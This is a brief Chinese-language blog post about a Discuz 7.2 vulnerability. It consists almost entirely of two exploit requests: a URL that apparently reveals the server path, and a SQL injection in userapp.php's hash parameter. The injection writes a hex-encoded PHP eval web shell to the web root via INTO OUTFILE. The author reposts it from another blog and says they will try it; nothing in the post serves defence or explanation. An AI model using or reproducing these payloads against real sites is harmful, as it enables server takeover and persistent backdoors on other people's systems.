浏览模式: 标准 | 列表Tag:dz

DZ 7.2 漏洞

Submitted by admin
2010, April 2, 9:17 AM

/manyou/admincp.php?my_suffix=%0A%0DTOBY57 爆路径

然后直接getshell
userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash=' union select NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E,NULL,NULL,NULL,NULL into outfile 'C:/inetpub/wwwroot/shell.php'%23

 

------

刚刚从ypde blog上看到的,有空试试去。。。

Tags: dz, discuz